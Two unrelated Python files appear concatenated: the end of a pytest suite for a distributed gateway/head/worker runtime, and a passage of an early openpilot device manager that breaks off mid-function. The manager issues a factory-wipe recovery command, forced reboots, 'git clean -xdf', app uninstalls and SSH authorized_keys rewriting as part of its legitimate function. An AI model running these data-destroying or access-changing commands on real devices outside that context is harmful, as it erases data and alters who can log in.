        assert replica_process.exitcode == 0
@pytest.mark.asyncio
async def test_runtimes_with_executor(port_generator):
    """10 shards plus uses_before/uses_after, all running NameChangeExecutor;
    verify the expected doc counts and per-stage doc texts."""
    graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
    runtime_processes = []
    uses_before_port, uses_before_process = await _create_worker(
        'pod0', port_generator, type='uses_before', executor='NameChangeExecutor'
    )
    runtime_processes.append(uses_before_process)
    uses_after_port, uses_after_process = await _create_worker(
        'pod0', port_generator, type='uses_after', executor='NameChangeExecutor'
    )
    runtime_processes.append(uses_after_process)
    # create head
    head_port = port_generator()
    pod_addresses = f'{{"pod0": ["0.0.0.0:{head_port}"]}}'
    # create some shards
    connection_list_dict = defaultdict(list)
    worker_ports = []
    for i in range(10):
        # create worker
        worker_port, worker_process = await _create_worker(
            'pod0', port_generator, type=f'shards/{i}', executor='NameChangeExecutor'
        )
        runtime_processes.append(worker_process)
        await asyncio.sleep(0.1)
        worker_ports.append(worker_port)
        connection_list_dict[i].append(f'127.0.0.1:{worker_port}')
    head_process = multiprocessing.Process(
        target=_create_head_runtime,
        args=(
            head_port,
            connection_list_dict,
            f'pod0/head',
            'ALL',
            f'127.0.0.1:{uses_before_port}',
            f'127.0.0.1:{uses_after_port}',
        ),
    )
    runtime_processes.append(head_process)
    head_process.start()
    # create a single gateway runtime
    port = port_generator()
    gateway_process = multiprocessing.Process(
        target=_create_gateway_runtime,
        args=(graph_description, pod_addresses, port),
    )
    gateway_process.start()
    runtime_processes.append(gateway_process)
    await asyncio.sleep(1.0)
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )
    c = Client(host='localhost', port=port, asyncio=True)
    responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
    response_list = []
    async for response in responses:
        response_list.append(response.docs)
    # clean up runtimes
    for process in runtime_processes:
        process.terminate()
    for process in runtime_processes:
        process.join()
    assert len(response_list) == 20
    assert (
        len(response_list[0]) == (1 + 1 + 1) * 10 + 1
    )  # 1 starting doc + 1 uses_before + every exec adds 1 * 10 shards + 1 doc uses_after
    doc_texts = [doc.text for doc in response_list[0]]
    assert doc_texts.count('client0-Request') == 10
    assert doc_texts.count('pod0/uses_before') == 10
    assert doc_texts.count('pod0/uses_after') == 1
    for i in range(10):
        assert doc_texts.count(f'pod0/shards/{i}') == 1
@pytest.mark.asyncio
async def test_runtimes_gateway_worker_direct_connection(port_generator):
    """Gateway connected straight to a single worker (no head runtime in between)."""
    worker_port = port_generator()
    port = port_generator()
    graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
    pod_addresses = f'{{"pod0": ["0.0.0.0:{worker_port}"]}}'

    # create the shards
    worker_process = multiprocessing.Process(
        target=_create_worker_runtime, args=(worker_port, f'pod0')
    )
    worker_process.start()

    await asyncio.sleep(0.1)

    # create a single gateway runtime
    gateway_process = multiprocessing.Process(
        target=_create_gateway_runtime,
        args=(graph_description, pod_addresses, port),
    )
    gateway_process.start()

    await asyncio.sleep(1.0)

    # block until the gateway answers on its control address (or timeout)
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )

    c = Client(host='localhost', port=port, asyncio=True)
    responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
    response_list = []
    async for response in responses:
        response_list.append(response)

    # clean up runtimes
    gateway_process.terminate()
    worker_process.terminate()
    gateway_process.join()
    worker_process.join()

    # async_inputs yields 20 docs with request_size=1 -> 20 responses of 1 doc each
    assert len(response_list) == 20
    assert len(response_list[0].docs) == 1
    # exitcode 0 means the runtimes shut down cleanly on terminate()
    assert gateway_process.exitcode == 0
    assert worker_process.exitcode == 0
@pytest.mark.asyncio
async def test_runtimes_with_replicas_advance_faster(port_generator):
    """With replicas, a fast request sent after a slow one must come back first."""
    head_port = port_generator()
    port = port_generator()
    graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
    pod_addresses = f'{{"pod0": ["0.0.0.0:{head_port}"]}}'

    # create the shards
    replica_processes = []
    worker_ports = []
    connection_list_dict = defaultdict(list)
    for i in range(10):
        # create worker
        worker_port = port_generator()
        # create a single worker runtime
        worker_process = multiprocessing.Process(
            target=_create_worker_runtime,
            args=(worker_port, f'pod0/{i}', 'FastSlowExecutor'),
        )
        replica_processes.append(worker_process)
        worker_process.start()

        await asyncio.sleep(0.1)
        worker_ports.append(worker_port)
        connection_list_dict[i].append(f'127.0.0.1:{worker_port}')

    # create a single head runtime (default polling, fans out to the replicas)
    head_process = multiprocessing.Process(
        target=_create_head_runtime, args=(head_port, connection_list_dict, 'head')
    )
    head_process.start()

    # create a single gateway runtime
    gateway_process = multiprocessing.Process(
        target=_create_gateway_runtime,
        args=(graph_description, pod_addresses, port),
    )
    gateway_process.start()

    await asyncio.sleep(1.0)
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )

    c = Client(host='localhost', port=port, asyncio=True)
    # 'slow' is sent first but FastSlowExecutor sleeps 1s on it
    input_docs = [Document(text='slow'), Document(text='fast')]
    responses = c.post('/', inputs=input_docs, request_size=1, return_responses=True)
    response_list = []
    async for response in responses:
        response_list.append(response)

    # clean up runtimes
    gateway_process.terminate()
    head_process.terminate()
    for replica_process in replica_processes:
        replica_process.terminate()

    gateway_process.join()
    head_process.join()
    for replica_process in replica_processes:
        replica_process.join()

    assert len(response_list) == 2
    for response in response_list:
        assert len(response.docs) == 1

    # the 'fast' doc overtook the 'slow' one because replicas process independently
    assert response_list[0].docs[0].text == 'fast'
    assert response_list[1].docs[0].text == 'slow'

    assert gateway_process.exitcode == 0
    assert head_process.exitcode == 0
    for replica_process in replica_processes:
        assert replica_process.exitcode == 0
@pytest.mark.asyncio
# test gateway to gateway communication
# this mimics using an external executor, fronted by a gateway
async def test_runtimes_gateway_to_gateway(port_generator):
    """Chain two gateways: outer gateway -> 'external' gateway -> worker."""
    worker_port = port_generator()
    external_gateway_port = port_generator()
    port = port_generator()
    graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
    # outer gateway routes 'pod0' to the external gateway; that gateway routes to the worker
    pod_addresses = f'{{"pod0": ["0.0.0.0:{external_gateway_port}"]}}'
    worker_addresses = f'{{"pod0": ["0.0.0.0:{worker_port}"]}}'

    # create a single worker runtime
    worker_process = multiprocessing.Process(
        target=_create_worker_runtime, args=(worker_port,)
    )
    worker_process.start()

    # create the "external" gateway runtime
    external_gateway_process = multiprocessing.Process(
        target=_create_gateway_runtime,
        args=(graph_description, worker_addresses, external_gateway_port),
    )
    external_gateway_process.start()

    # create a single gateway runtime
    gateway_process = multiprocessing.Process(
        target=_create_gateway_runtime,
        args=(graph_description, pod_addresses, port),
    )
    gateway_process.start()

    await asyncio.sleep(1.0)

    # wait until all three runtimes answer on their control addresses
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{external_gateway_port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{worker_port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )

    # send requests to the gateway
    c = Client(host='localhost', port=port, asyncio=True)
    responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
    response_list = []
    async for response in responses:
        response_list.append(response)

    # clean up runtimes
    gateway_process.terminate()
    external_gateway_process.terminate()
    worker_process.terminate()
    gateway_process.join()
    external_gateway_process.join()
    worker_process.join()

    assert len(response_list) == 20
    assert len(response_list[0].docs) == 1
    assert gateway_process.exitcode == 0
    assert external_gateway_process.exitcode == 0
    assert worker_process.exitcode == 0
class NameChangeExecutor(Executor):
    """Appends one Document carrying this executor's runtime name to every request."""

    def __init__(self, runtime_args, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # name of the pod/shard this executor runs in (e.g. 'pod0/shards/3')
        self.name = runtime_args['name']

    @requests
    def foo(self, docs, **kwargs):
        docs.append(Document(text=self.name))
        return docs
class FastSlowExecutor(Executor):
    """Delays any request containing a Document with text 'slow' by one second."""

    @requests
    def foo(self, docs, **kwargs):
        for d in docs:
            if d.text == 'slow':
                time.sleep(1.0)
async def _create_worker(pod, port_generator, type='worker', executor=None):
    """Spawn a WorkerRuntime in a child process; return (port, process)."""
    port = port_generator()
    proc = multiprocessing.Process(
        target=_create_worker_runtime,
        args=(port, f'{pod}/{type}', executor),
    )
    proc.start()
    return port, proc
def _create_worker_runtime(port, name='', executor=None):
    """Run a WorkerRuntime (blocking) on the given port; used as a Process target."""
    args = set_pod_parser().parse_args([])
    args.port = port
    args.name = name
    if executor:
        # executor is a class name string, resolved by the runtime
        args.uses = executor
    with WorkerRuntime(args) as runtime:
        runtime.run_forever()
def _create_head_runtime(
    port,
    connection_list_dict,
    name='',
    polling='ANY',
    uses_before=None,
    uses_after=None,
    retries=-1,
):
    """Run a HeadRuntime (blocking); used as a Process target.

    connection_list_dict maps shard/replica id -> list of worker addresses.
    polling 'ALL' broadcasts to every shard; anything else means 'ANY'.
    """
    args = set_pod_parser().parse_args([])
    args.port = port
    args.name = name
    args.retries = retries
    args.polling = PollingType.ANY if polling == 'ANY' else PollingType.ALL
    if uses_before:
        args.uses_before_address = uses_before
    if uses_after:
        args.uses_after_address = uses_after
    # the runtime expects the connection list serialized as JSON
    args.connection_list = json.dumps(connection_list_dict)

    with HeadRuntime(args) as runtime:
        runtime.run_forever()
def _create_gateway_runtime(
    graph_description, pod_addresses, port, protocol='grpc', retries=-1
):
    """Run a gateway runtime (blocking) for the given protocol; used as a Process target."""
    if protocol == 'http':
        gateway_runtime = HTTPGatewayRuntime
    elif protocol == 'websocket':
        gateway_runtime = WebSocketGatewayRuntime
    else:
        # default protocol is gRPC
        gateway_runtime = GRPCGatewayRuntime
    with gateway_runtime(
        set_gateway_parser().parse_args(
            [
                '--graph-description',
                graph_description,
                '--deployments-addresses',
                pod_addresses,
                '--port',
                str(port),
                '--retries',
                str(retries),
            ]
        )
    ) as runtime:
        runtime.run_forever()
async def async_inputs():
    """Async generator yielding twenty identical client request Documents."""
    sent = 0
    while sent < 20:
        yield Document(text='client0-Request')
        sent += 1
|
manager.py | #!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
    """Fork via a pty and pump the child's output through a non-blocking stdout.

    The parent copies the child's pty output to its own stdout and exits with
    the child's wait status; the child (return value 0 from forkpty) continues
    running the rest of the program.
    """
    # get a non-blocking stdout
    child_pid, child_pty = os.forkpty()
    if child_pid != 0:  # parent
        # child is in its own process group, manually pass kill signals
        signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
        signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))

        fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
                    fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)

        while True:
            try:
                dat = os.read(child_pty, 4096)
            except OSError as e:
                # EIO means the child side of the pty closed (child exited)
                if e.errno == errno.EIO:
                    break
                continue

            if not dat:
                break

            try:
                sys.stdout.write(dat)
            except (OSError, IOError):
                # stdout is non-blocking; drop output rather than crash
                pass

        os._exit(os.wait()[1])
if __name__ == "__main__":
    # Before anything else: make sure NEOS (the device OS) is new enough.
    # /init.qcom.rc only exists on the NEOS device image.
    is_neos = os.path.isfile("/init.qcom.rc")
    neos_update_required = False
    if is_neos:
        version = int(open("/VERSION").read()) if os.path.isfile("/VERSION") else 0
        revision = int(open("/REVISION").read()) if version >= 10 else 0  # Revision only present in NEOS 10 and up
        # require at least NEOS 10.4
        neos_update_required = version < 10 or (version == 10 and revision < 4)

    if neos_update_required:
        # update continue.sh before updating NEOS
        if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
            from shutil import copyfile
            copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")

        # run the updater
        print("Starting NEOS updater")
        subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
        updater_dir = os.path.join(BASEDIR, "installer", "updater")
        manifest_path = os.path.realpath(os.path.join(updater_dir, "update.json"))
        os.system(os.path.join(updater_dir, "updater") + " file://" + manifest_path)
        # the updater reboots the device; reaching this line means it failed
        raise Exception("NEOS outdated")
    elif os.path.isdir("/data/neoupdate"):
        # clean up a leftover staged update
        from shutil import rmtree
        rmtree("/data/neoupdate")

    unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import re
import stat
import subprocess
import traceback
from multiprocessing import Process
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.file_helpers import atomic_write_in_dir_neos
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
# value is either a python module path (string) or a (directory, argv) tuple
# for a native binary launched from that directory.
managed_processes = {
    "thermald": "selfdrive.thermald",
    # "uploader": "selfdrive.loggerd.uploader",
    "deleter": "selfdrive.loggerd.deleter",
    "controlsd": "selfdrive.controls.controlsd",
    "plannerd": "selfdrive.controls.plannerd",
    "radard": "selfdrive.controls.radard",
    "ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
    "loggerd": ("selfdrive/loggerd", ["./loggerd"]),
    "logmessaged": "selfdrive.logmessaged",
    "tombstoned": "selfdrive.tombstoned",
    "logcatd": ("selfdrive/logcatd", ["./logcatd"]),
    "proclogd": ("selfdrive/proclogd", ["./proclogd"]),
    "boardd": ("selfdrive/boardd", ["./boardd"]),  # not used directly
    "pandad": "selfdrive.pandad",
    "ui": ("selfdrive/ui", ["./start.py"]),
    "calibrationd": "selfdrive.locationd.calibrationd",
    "paramsd": ("selfdrive/locationd", ["./paramsd"]),
    "visiond": ("selfdrive/visiond", ["./visiond"]),
    "sensord": ("selfdrive/sensord", ["./start_sensord.py"]),
    "gpsd": ("selfdrive/sensord", ["./start_gpsd.py"]),
    # "updated": "selfdrive.updated",
}

# daemons outlive the manager; tracked by pid stored in Params (see start_daemon_process)
daemon_processes = {
    "athenad": "selfdrive.athena.athenad",
}

android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")

# name -> multiprocessing.Process for every currently-started managed process
running = {}


def get_running():
    """Return the dict of currently running managed processes."""
    return running


# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']

# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []

# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']

# started at boot and kept alive regardless of car state
persistent_processes = [
    'thermald',
    'logmessaged',
    'logcatd',
    'tombstoned',
    'uploader',
    'ui',
    'updated',
]

# started when the car turns on, stopped when it turns off
car_started_processes = [
    'controlsd',
    'plannerd',
    'loggerd',
    'sensord',
    'radard',
    'calibrationd',
    'paramsd',
    'visiond',
    'proclogd',
    'ubloxd',
    'gpsd',
    'deleter',
]
def register_managed_process(name, desc, car_started=False):
    """Register an extra managed process at runtime (used by extensions)."""
    global managed_processes, car_started_processes, persistent_processes
    print("registering %s" % name)
    managed_processes[name] = desc
    # car_started processes only run while driving; everything else is persistent
    bucket = car_started_processes if car_started else persistent_processes
    bucket.append(name)
# ****************** process management functions ******************
def launcher(proc):
    """Process entry point for python managed processes: import `proc` and run its main()."""
    try:
        # import the process
        mod = importlib.import_module(proc)

        # rename the process
        setproctitle(proc)

        # terminate the zmq context since we forked
        import zmq
        zmq.Context.instance().term()

        # exec the process
        mod.main()
    except KeyboardInterrupt:
        cloudlog.warning("child %s got SIGINT" % proc)
    except Exception:
        # can't install the crash handler because sys.excepthook doesn't play nice
        # with threads, so catch it here.
        crash.capture_exception()
        raise
def nativelauncher(pargs, cwd):
    """Process entry point for native managed processes: chdir and exec the binary."""
    # exec the process
    os.chdir(cwd)

    # because when extracted from pex zips permissions get lost -_-
    os.chmod(pargs[0], 0o700)

    # replaces this process image; does not return on success
    os.execvp(pargs[0], pargs)
def start_managed_process(name):
    """Start a managed process by name; no-op if already running or unknown."""
    if name in running or name not in managed_processes:
        return
    proc = managed_processes[name]
    if isinstance(proc, str):
        # python module: fork and run its main() via launcher
        cloudlog.info("starting python %s" % proc)
        running[name] = Process(name=name, target=launcher, args=(proc,))
    else:
        # native binary: (directory, argv) tuple, exec'd via nativelauncher
        pdir, pargs = proc
        cwd = os.path.join(BASEDIR, pdir)
        cloudlog.info("starting process %s" % name)
        running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
    running[name].start()
def start_daemon_process(name, params):
    """Start a daemon process unless its stored pid is still alive.

    The pid is persisted in Params under "<Name>Pid" so the daemon survives
    manager restarts.
    """
    proc = daemon_processes[name]
    pid_param = name.capitalize() + 'Pid'
    pid = params.get(pid_param)

    if pid is not None:
        try:
            os.kill(int(pid), 0)
            # process is running (kill is a poorly-named system call)
            return
        except OSError:
            # process is dead
            pass

    cloudlog.info("starting daemon %s" % name)
    # detach: own process group, output discarded, cwd at filesystem root
    proc = subprocess.Popen(['python', '-m', proc],
                            cwd='/',
                            stdout=open('/dev/null', 'w'),
                            stderr=open('/dev/null', 'w'),
                            preexec_fn=os.setpgrp)

    params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
    """Pre-import a python managed process, or build a native one with make."""
    proc = managed_processes[p]
    if isinstance(proc, str):
        # import this python
        cloudlog.info("preimporting %s" % proc)
        importlib.import_module(proc)
    else:
        # build this process
        cloudlog.info("building %s" % (proc,))
        try:
            subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
        except subprocess.CalledProcessError:
            # make clean if the build failed
            cloudlog.warning("building %s failed, make clean" % (proc, ))
            subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
            subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
    """Stop a running managed process, escalating signals if it refuses to die.

    Signal choice: SIGINT for interrupt_processes, SIGKILL for kill_processes,
    SIGTERM otherwise. Escalates to SIGKILL after 5s, except for unkillable
    processes, which get 15 more seconds and then force a device reboot.
    """
    if name not in running or name not in managed_processes:
        return
    cloudlog.info("killing %s" % name)

    if running[name].exitcode is None:
        if name in interrupt_processes:
            os.kill(running[name].pid, signal.SIGINT)
        elif name in kill_processes:
            os.kill(running[name].pid, signal.SIGKILL)
        else:
            running[name].terminate()

        # give it 5 seconds to die
        running[name].join(5.0)
        if running[name].exitcode is None:
            if name in unkillable_processes:
                # SIGKILLing these can corrupt kernel page tables; reboot instead
                cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
                running[name].join(15.0)
                if running[name].exitcode is None:
                    cloudlog.critical("FORCE REBOOTING PHONE!")
                    os.system("date >> /sdcard/unkillable_reboot")
                    os.system("reboot")
                    raise RuntimeError
            else:
                cloudlog.info("killing %s with SIGKILL" % name)
                os.kill(running[name].pid, signal.SIGKILL)
                running[name].join()

    cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
    del running[name]
def pm_apply_packages(cmd):
    """Apply a package-manager subcommand (e.g. 'enable'/'disable') to every comma Android package."""
    for pkg in android_packages:
        system("pm %s %s" % (cmd, pkg))
def cleanup_all_processes(signal, frame):
    """Signal-handler-shaped teardown: disable UI packages and kill every managed process."""
    cloudlog.info("caught ctrl-c %s %s" % (signal, frame))

    pm_apply_packages('disable')

    # list() because kill_managed_process mutates `running` while we iterate
    for name in list(running.keys()):
        kill_managed_process(name)
    cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
    """Register with the server (or use a dummy id), then bind logging/crash metadata.

    Raises if should_register is True and server registration fails.
    """
    if should_register:
        reg_res = register()
        if reg_res:
            dongle_id, dongle_secret = reg_res
        else:
            raise Exception("server registration failed")
    else:
        # offline/test mode: fixed dummy dongle id
        dongle_id = "c"*16

    # set dongle id
    cloudlog.info("dongle id is " + dongle_id)
    os.environ['DONGLE_ID'] = dongle_id

    cloudlog.info("dirty is %d" % dirty)
    if not dirty:
        os.environ['CLEAN'] = '1'

    cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
    crash.bind_user(id=dongle_id)
    crash.bind_extra(version=version, dirty=dirty, is_eon=True)

    os.umask(0)
    try:
        # log root must be world-writable so all processes can log
        os.mkdir(ROOT, 0o777)
    except OSError:
        # already exists
        pass
def system(cmd):
    """Run a shell command, logging it; failures are logged (not raised)."""
    try:
        cloudlog.info("running %s" % cmd)
        subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
    except subprocess.CalledProcessError as e:
        # best-effort: record the failure with the tail of its output
        cloudlog.event("running failed",
                       cmd=e.cmd,
                       output=e.output[-1024:],
                       returncode=e.returncode)
def manager_thread():
    """Main manager loop: start processes, then supervise based on thermal/car state."""
    # now loop
    thermal_sock = messaging.sub_sock(service_list['thermal'].port)

    cloudlog.info("manager start")
    cloudlog.info({"environ": os.environ})

    # save boot log
    subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))

    params = Params()

    # start daemon processes
    for p in daemon_processes:
        start_daemon_process(p, params)

    # start persistent processes
    for p in persistent_processes:
        start_managed_process(p)

    # start frame
    pm_apply_packages('enable')
    system("LD_LIBRARY_PATH= appops set ai.comma.plus.offroad SU allow")
    system("am start -n ai.comma.plus.frame/.MainActivity")

    if os.getenv("NOBOARD") is None:
        start_managed_process("pandad")

    logger_dead = False

    while 1:
        # blocks until the next thermal message arrives
        msg = messaging.recv_sock(thermal_sock, wait=True)

        # uploader is gated based on the phone temperature
        if msg.thermal.thermalStatus >= ThermalStatus.yellow:
            kill_managed_process("uploader")
        else:
            start_managed_process("uploader")

        # stop logging when free space drops below 5%
        if msg.thermal.freeSpace < 0.05:
            logger_dead = True

        if msg.thermal.started:
            for p in car_started_processes:
                if p == "loggerd" and logger_dead:
                    kill_managed_process(p)
                else:
                    start_managed_process(p)
        else:
            # car is off: reset the logger flag and stop all driving processes
            logger_dead = False
            for p in car_started_processes:
                kill_managed_process(p)

        # check the status of all processes, did any of them die?
        running_list = [" running %s %s" % (p, running[p]) for p in running]
        cloudlog.debug('\n'.join(running_list))

        # is this still needed?
        if params.get("DoUninstall") == "1":
            break
def get_installed_apks():
    """Return a dict mapping installed package name -> apk path.

    Parses `pm list packages -f`, whose lines look like
    "package:<apk path>=<package name>".
    """
    dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
    ret = {}
    for x in dat:
        if x.startswith("package:"):
            # rsplit on the last '=': apk paths may themselves contain '='
            # (plain split("=") would raise ValueError on such lines)
            v, k = x.split("package:")[1].rsplit("=", 1)
            ret[k] = v
    return ret
def install_apk(path):
    """Stage an apk on /sdcard and install it with `pm install -r`; return True on success."""
    # can only install from world readable path
    staged = "/sdcard/%s" % os.path.basename(path)
    shutil.copyfile(path, staged)
    exitcode = subprocess.call(["pm", "install", "-r", staged])
    os.remove(staged)
    return exitcode == 0
def update_apks():
    """Install or upgrade every bundled apk whose sha1 differs from the installed copy."""
    # install apks
    installed = get_installed_apks()

    install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
    for apk in install_apks:
        app = os.path.basename(apk)[:-4]
        if app not in installed:
            # bundled but not yet installed
            installed[app] = None

    cloudlog.info("installed apks %s" % (str(installed), ))

    for app in installed.keys():
        apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
        if not os.path.exists(apk_path):
            continue

        # fix: apks are binary files - open in "rb" so hashing is correct on
        # every platform and under python 3 (text mode would decode/translate)
        h1 = hashlib.sha1(open(apk_path, "rb").read()).hexdigest()
        h2 = None
        if installed[app] is not None:
            h2 = hashlib.sha1(open(installed[app], "rb").read()).hexdigest()
            cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))

        if h2 is None or h1 != h2:
            cloudlog.info("installing %s" % app)
            success = install_apk(apk_path)
            if not success:
                # a signature mismatch blocks reinstall; uninstall first and retry
                cloudlog.info("needing to uninstall %s" % app)
                system("pm uninstall %s" % app)
                success = install_apk(apk_path)
            assert success
def update_ssh():
    """Rewrite authorized_keys from the persisted baseline plus GithubSshKeys from Params.

    On first run, derives the persisted baseline from the current keys with a
    LAN-only host filter prepended. Remounts /system read-write only when the
    file actually needs to change.
    """
    ssh_home_dirpath = "/system/comma/home/.ssh/"
    auth_keys_path = os.path.join(ssh_home_dirpath, "authorized_keys")
    auth_keys_persist_path = os.path.join(ssh_home_dirpath, "authorized_keys.persist")
    auth_keys_mode = stat.S_IREAD | stat.S_IWRITE

    params = Params()
    github_keys = params.get("GithubSshKeys") or ''

    old_keys = open(auth_keys_path).read()
    has_persisted_keys = os.path.exists(auth_keys_persist_path)
    if has_persisted_keys:
        persisted_keys = open(auth_keys_persist_path).read()
    else:
        # add host filter to any key line that doesn't already carry a from= clause
        persisted_keys = re.sub(r'^(?!.+?from.+? )(ssh|ecdsa)', 'from="10.0.0.0/8,172.16.0.0/12,192.168.0.0/16" \\1', old_keys, flags=re.MULTILINE)

    new_keys = persisted_keys + '\n' + github_keys

    if has_persisted_keys and new_keys == old_keys and os.stat(auth_keys_path)[stat.ST_MODE] == auth_keys_mode:
        # nothing to do - let's avoid remount
        return

    try:
        subprocess.check_call(["mount", "-o", "rw,remount", "/system"])
        if not has_persisted_keys:
            atomic_write_in_dir_neos(auth_keys_persist_path, persisted_keys, mode=auth_keys_mode)
        atomic_write_in_dir_neos(auth_keys_path, new_keys, mode=auth_keys_mode)
    finally:
        try:
            subprocess.check_call(["mount", "-o", "ro,remount", "/system"])
        except:
            cloudlog.exception("Failed to remount as read-only")
            # this can fail due to "Device busy" - reboot if so
            os.system("reboot")
            raise RuntimeError
def manager_update():
    """Refresh SSH keys and bundled apks, and remove blacklisted apps."""
    update_ssh()
    update_apks()

    # remove apps that should not run alongside openpilot
    uninstall = [app for app in get_installed_apks().keys() if app in ("com.spotify.music", "com.waze")]
    for app in uninstall:
        cloudlog.info("uninstalling %s" % app)
        # fixed broken format string: was "pm uninstall % s" (typo'd conversion spec)
        os.system("pm uninstall %s" % app)
def manager_prepare():
    """Build cereal, then pre-import/build every managed process."""
    # build cereal first
    subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))

    # build/import paths are relative to this file's directory
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
    for name in managed_processes:
        prepare_managed_process(name)
def uninstall():
    """Schedule a factory wipe through Android recovery and reboot into it."""
    cloudlog.warning("uninstalling")
    with open('/cache/recovery/command', 'w') as f:
        f.write('--wipe_data\n')
    # IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
    os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
    """Program entry point: configure the device, seed Params, then run the manager loop."""
    # the flippening!
    os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')

    # disable bluetooth
    os.system('service call bluetooth_manager 8')

    # env-var switches to strip processes out of the managed set
    if os.getenv("NOLOG") is not None:
        del managed_processes['loggerd']
        del managed_processes['tombstoned']
    if os.getenv("NOUPLOAD") is not None:
        del managed_processes['uploader']
    if os.getenv("NOVISION") is not None:
        del managed_processes['visiond']
    if os.getenv("LEAN") is not None:
        del managed_processes['uploader']
        del managed_processes['loggerd']
        del managed_processes['logmessaged']
        del managed_processes['logcatd']
        del managed_processes['tombstoned']
        del managed_processes['proclogd']
    if os.getenv("NOCONTROL") is not None:
        del managed_processes['controlsd']
        del managed_processes['plannerd']
        del managed_processes['radard']

    # support additional internal only extensions
    try:
        import selfdrive.manager_extensions
        selfdrive.manager_extensions.register(register_managed_process) # pylint: disable=no-member
    except ImportError:
        pass

    params = Params()
    params.manager_start()

    # set unset params
    if params.get("IsMetric") is None:
        params.put("IsMetric", "0")
    if params.get("RecordFront") is None:
        params.put("RecordFront", "0")
    if params.get("HasAcceptedTerms") is None:
        params.put("HasAcceptedTerms", "0")
    if params.get("IsUploadRawEnabled") is None:
        params.put("IsUploadRawEnabled", "1")
    if params.get("IsUploadVideoOverCellularEnabled") is None:
        params.put("IsUploadVideoOverCellularEnabled", "1")
    if params.get("IsGeofenceEnabled") is None:
        params.put("IsGeofenceEnabled", "-1")
    if params.get("SpeedLimitOffset") is None:
        params.put("SpeedLimitOffset", "0")
    if params.get("LongitudinalControl") is None:
        params.put("LongitudinalControl", "0")
    if params.get("LimitSetSpeed") is None:
        params.put("LimitSetSpeed", "0")
    if params.get("LimitSetSpeedNeural") is None:
        params.put("LimitSetSpeedNeural", "0")

    # is this chffrplus?
    if os.getenv("PASSIVE") is not None:
        params.put("Passive", str(int(os.getenv("PASSIVE"))))

    #if params.get("Passive") is None:
    #  raise Exception("Passive must be set to continue")

    # put something on screen while we set things up
    if os.getenv("PREPAREONLY") is not None:
        spinner_proc = None
    else:
        spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
